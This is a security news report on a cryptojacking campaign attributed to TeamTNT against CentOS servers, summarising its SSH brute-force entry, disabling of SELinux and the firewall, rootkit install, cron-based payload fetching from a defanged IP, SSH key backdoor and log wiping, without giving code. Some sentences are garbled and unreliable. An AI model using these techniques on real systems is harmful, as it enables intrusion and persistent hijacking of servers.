A cryptojacking operation known as Team TNT has probably relaunched as part of a new campaign targeting virtual private server (VPS) infrastructure based on the CentOS operating system.
“The initial access was accomplished through a brute-force Secure Shell (SSH) attack on the victim’s assets, during which the threat actor downloaded a malicious script,” Group-IB researchers Vito Alfano and Nam Le Phuong said in Wednesday’s report.
The malicious script, the Singapore-based cybersecurity firm noted, is responsible for disabling security features, deleting logs, halting cryptocurrency mining processes, and preventing recovery.
Attack chains ultimately pave the way for deployment Diamorphine rootkit to hide malicious processes as well as to set up permanent remote access to the compromised host.
The campaign was attributed to TeamTNT with moderate confidence, citing similarities in observed tactics, techniques and procedures (TTP).
TeamTNT was first discovered in the wild in 2019, carrying out illegal cryptocurrency mining activities by infiltrating cloud and container environments. Although the Threat actor said goodbye in November 2021, announcing a “clean exit”, public reports revealed several companies started by a team of hackers since then September 2022.
Recent activity associated with a group is detected as a shell script that first checks to see if it has been previously infected by other hacking operations, then compromises the device by disabling SELinuxAppArmor and Firewall.
 |
| Changes have been made to the ssh service |
“The script looks for a daemon associated with Alibaba’s cloud provider called aliyun.service,” the researchers said. “When it detects this daemon, it downloads a bash script from update.aegis.aliyun.com to remove the service.”
In addition to stopping all competing cryptocurrency mining processes, the script takes steps to execute a series of commands to remove traces left by other miners, stop container processes, and remove images deployed in association with any coin miners.
He also ensures resiliency by setting up cron jobs that download a shell script every 30 minutes from a remote server (65.108.48(.)150) and modifying the “/root/.ssh/authorized_keys” file to add a backdoor account.
“It locks down the system by changing file attributes, creating a backdoor root user, and erasing the command history to hide its activity,” the researchers noted. “A threat actor leaves nothing to chance; indeed, the script implements various changes to the configuration of the SSH service and the firewall.’
